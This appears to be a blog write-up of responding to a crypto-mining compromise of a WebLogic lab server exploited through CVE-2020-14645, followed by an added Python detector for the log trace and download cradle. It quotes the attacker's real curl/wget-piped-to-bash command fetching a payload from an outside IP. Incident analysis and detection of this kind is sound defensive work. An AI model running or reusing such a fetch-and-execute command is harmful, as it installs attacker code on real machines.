
A Malicious Crypto-Mining Incident: On-the-Spot Incident Response!

How it started

There I was, strutting out of the office after work, when an SMS from Alibaba Cloud suddenly landed?!

My potato box had been hit by a crypto-miner!!!?

Spoiler first: I dug through a pile of stuff and found nothing; damn it, that guy cleaned up far too thoroughly!

Isn't this a live incident-response lesson?! Let's go!!!

A while back I reproduced CVE-2020-14645. A friend wanted to play with it, so I happily stood up the environment with Docker on my potato box.

Trusting my gut, I stopped Docker right away. Once home I logged in to Alibaba Cloud, and sure enough the alert was for that target box. Running a mining operation really isn't easy these days; you even have to exploit freshly disclosed vulnerabilities~~~

Looking at the alert detection on Alibaba Cloud


A GET request was made to the address http://89.178.232.69:9000/seele

It is a dynamic IP, so there is not much to see there.

```
curl
-s    # the -s flag suppresses error and progress output
```
```
/java/bin/java -server -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,address=8453,server=y,suspend=n 
-Djava.compiler=NONE -Xms256m -Xmx512m -XX:CompileThreshold=8000 -cp /u01/app/oracle/middleware/wlserver/server/lib/weblogic-launcher.jar
-Dlaunch.use.env.classpath=true -Dweblogic.Name=AdminServer
-Djava.security.policy=/u01/app/oracle/middleware/wlserver/server/lib/weblogic.policy
-Djava.system.class.loader=com.oracle.classloader.weblogic.LaunchClassLoader
-javaagent:/u01/app/oracle/middleware/wlserver/server/lib/debugpatch-agent.jar -ea -da:com.bea... -da:javelin... -da:weblogic... -ea:com.bea.wli... -ea:com.bea.broker... -ea:com.bea.sbconsole... -Dwls.home=/u01/app/oracle/middleware/wlserver/server -Dweblogic.home=/u01/app/oracle/middleware/wlserver/server weblogic.Server
```

The -Xdebug startup command (explained in great detail elsewhere)

Parent PID: 15015
PID: 27557

```
/bin/sh -c (curl -s http://89.178.232.69:9000/seele||wget -q -O- http://89.178.232.69:9000/seele)|bash
```

```
wget
-q, --quiet                  quiet mode (no output)
-O, --output-document=FILE   write the document to FILE
```

[Figure: the mining process discovered]

[Figure: access to the malicious IP]

[Figure: the C2 IP]

Log analysis

First, take a look at the WebLogic access log:

```
oracle/Domains/ExampleSilentWTDomain/servers/AdminServer/logs
```

[Figure: access.log]

Along the way I also found a few malicious IPs belonging to Tencent Cloud.

In ExampleSilentWTDomain.log I found the attack from 4 pm that afternoon (there is an 8-hour time-zone offset):

```
####<Aug 7, 2020 8:50:35,581 AM UTC> <Error> <RJVM> <4695b9b44637> <AdminServer> <ExecuteThread: '0' for queue: 'weblogic.socket.Muxer'> <<WLS Kernel>> <> <6e5ae28b-117c-4080-b9d7-25c5070c1882-00000019> <1596790235581> <[severity-value: 8] [rid: 0] [partition-id: 0] [partition-name: DOMAIN] > <BEA-000503> <Incoming message header or abbreviation processing failed. 
java.lang.ClassCastException: java.lang.UNIXProcess cannot be cast to java.lang.Comparable
java.lang.ClassCastException: java.lang.UNIXProcess cannot be cast to java.lang.Comparable
at com.tangosol.util.comparator.ExtractorComparator.compare(ExtractorComparator.java:71)
at java.util.PriorityQueue.siftDownUsingComparator(PriorityQueue.java:722)
at java.util.PriorityQueue.siftDown(PriorityQueue.java:688)
at java.util.PriorityQueue.heapify(PriorityQueue.java:737)
at java.util.PriorityQueue.readObject(PriorityQueue.java:797)
at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
at java.lang.reflect.Method.invoke(Method.java:498)
at java.io.ObjectStreamClass.invokeReadObject(ObjectStreamClass.java:1170)
at java.io.ObjectInputStream.readSerialData(ObjectInputStream.java:2178)
at java.io.ObjectInputStream.readOrdinaryObject(ObjectInputStream.java:2069)
at java.io.ObjectInputStream.readObject0(ObjectInputStream.java:1573)
at java.io.ObjectInputStream.readObject(ObjectInputStream.java:431)
at weblogic.rjvm.InboundMsgAbbrev.readObject(InboundMsgAbbrev.java:73)
at weblogic.rjvm.InboundMsgAbbrev.read(InboundMsgAbbrev.java:45)
at weblogic.rjvm.MsgAbbrevJVMConnection.readMsgAbbrevs(MsgAbbrevJVMConnection.java:325)
at weblogic.rjvm.MsgAbbrevInputStream.init(MsgAbbrevInputStream.java:219)
at weblogic.rjvm.MsgAbbrevJVMConnection.dispatch(MsgAbbrevJVMConnection.java:557)
at weblogic.rjvm.t3.MuxableSocketT3.dispatch(MuxableSocketT3.java:666)
at weblogic.socket.BaseAbstractMuxableSocket.dispatch(BaseAbstractMuxableSocket.java:397)
at weblogic.socket.SocketMuxer.readReadySocketOnce(SocketMuxer.java:993)
at weblogic.socket.SocketMuxer.readReadySocket(SocketMuxer.java:929)
at weblogic.socket.NIOSocketMuxer.process(NIOSocketMuxer.java:599)
at weblogic.socket.NIOSocketMuxer.processSockets(NIOSocketMuxer.java:563)
at weblogic.socket.SocketReaderRequest.run(SocketReaderRequest.java:30)
at weblogic.socket.SocketReaderRequest.execute(SocketReaderRequest.java:43)
at weblogic.kernel.ExecuteThread.execute(ExecuteThread.java:147)
at weblogic.kernel.ExecuteThread.run(ExecuteThread.java:119)
>
```

The shell history had been deleted, and it felt like a lot of other data had been wiped as well.

The login records had been deleted too.

As expected, all the important evidence had been cleared out. That is how it goes in the real world~

[Figure: /var/log]

Sorting out the sequence of events

First, by scanning, the attacker discovered that my target box was vulnerable.

[Figure: event investigation]

The miner was delivered via curl and wget -> the malicious IP was contacted and the mining program executed -> after the script dropped and ran the miner, it deleted the records on its way out.
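As an added example (not part of the original post), here is a small Python script that flags the two artifacts this write-up turned up: a WebLogic domain-log entry whose BEA-000503 stack trace carries the Coherence ExtractorComparator/PriorityQueue frames seen above, and a process command line shaped like the `(curl ...||wget ...)|bash` download cradle from the alert. The log text, the command line and the 198.51.100.7 address are constructed samples, not data from the compromised host.

```python
import re

# Constructed sample (not the original host's log): a trimmed domain log with one BEA-000503 entry and one benign entry.
SAMPLE_DOMAIN_LOG = """\
####<Aug 7, 2020 8:50:35,581 AM UTC> <Error> <RJVM> <host1> <AdminServer> <<WLS Kernel>> <> <> <1596790235581> <BEA-000503> <Incoming message header or abbreviation processing failed.
java.lang.ClassCastException: java.lang.UNIXProcess cannot be cast to java.lang.Comparable
at com.tangosol.util.comparator.ExtractorComparator.compare(ExtractorComparator.java:71)
at java.util.PriorityQueue.readObject(PriorityQueue.java:797)
at weblogic.rjvm.InboundMsgAbbrev.readObject(InboundMsgAbbrev.java:73)
>
####<Aug 7, 2020 9:00:00,000 AM UTC> <Info> <Server> <host1> <AdminServer> <<WLS Kernel>> <> <> <1596790800000> <BEA-002613> <Channel "Default" is now listening.>
"""
# Constructed command line shaped like the one in the alert; 198.51.100.7 is a TEST-NET placeholder.
SAMPLE_CMDLINE = ("/bin/sh -c (curl -s http://198.51.100.7:9000/seele"
                  "||wget -q -O- http://198.51.100.7:9000/seele)|bash")

# Stack frames that together show the Coherence ExtractorComparator/PriorityQueue gadget being deserialized from an inbound T3 message.
GADGET_FRAMES = (
    "com.tangosol.util.comparator.ExtractorComparator.compare",
    "java.util.PriorityQueue.readObject",
    "weblogic.rjvm.InboundMsgAbbrev.readObject",
)
HEADER_RE = re.compile(r"^####<([^>]+)> <(\w+)> <(\w+)>")   # timestamp, severity, subsystem
MSGID_RE = re.compile(r"<(BEA-\d+)>")
# "(curl ...||wget ...)|bash": fetch-and-pipe-to-shell download cradle
CRADLE_RE = re.compile(
    r"\(\s*(?:curl|wget)\b[^)]*\|\|\s*(?:curl|wget)\b[^)]*\)\s*\|\s*(?:ba)?sh\b")
URL_RE = re.compile(r"https?://[^\s'\")|]+")

def find_t3_deserialization(log_text):
    """Return (timestamp, message id) for each RJVM entry that carries the gadget trace."""
    hits = []
    for raw in log_text.split("####<")[1:]:      # every WebLogic log entry starts with ####<
        entry = "####<" + raw
        header = HEADER_RE.match(entry)
        msgid = MSGID_RE.search(entry)
        if not header or not msgid:
            continue
        ts, _severity, subsystem = header.groups()
        frames_seen = sum(frame in entry for frame in GADGET_FRAMES)
        if msgid.group(1) == "BEA-000503" and subsystem == "RJVM" and frames_seen >= 2:
            hits.append((ts, msgid.group(1)))
    return hits

def find_download_cradle(cmdline):
    """Return the URLs a curl/wget-to-shell cradle fetches, or an empty set if it is not one."""
    if not CRADLE_RE.search(cmdline):
        return set()
    return set(URL_RE.findall(cmdline))
```

Run the two functions over a real domain log and over the command lines from `ps -eo pid,ppid,args` to get the timestamp of the deserialization attempt and the URL the cradle fetched, which are the first two things to pivot on before the attacker's cleanup removes everything else.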